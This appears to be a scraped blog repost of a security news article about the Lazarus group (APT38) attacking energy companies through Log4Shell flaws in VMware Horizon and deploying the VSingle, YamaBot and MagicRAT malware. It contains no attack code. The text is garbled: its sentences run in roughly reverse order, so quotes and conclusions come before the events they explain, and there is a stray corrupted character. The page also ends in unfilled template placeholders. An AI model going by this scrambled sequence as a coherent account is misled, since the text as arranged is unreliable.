The company clarified that Symantec Opens a new window and South Korea’s AhnLab Opens a new window previously detailed the campaign but Lazarus has updated its M.O., evident from the use of MagicRAT. Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. CSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws. In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. This poses a huge threat to some of the most critical systems within the critical infrastructure space.” However, it seems there are still systems that have not been patched yet. “In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks. “The Log4j exploit used in these attacks has been known, and called critical, for over a year. Lazarus’ established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j. According to threat research firm Cisco Talos, APT38’s campaign was active Opens a new window until July this year. The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities. According to Cisco Talos, APT 38 targets VMWare Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.ĪPT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist Opens a new window, the biggest cryptocurrency theft in history, in April 2022. North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |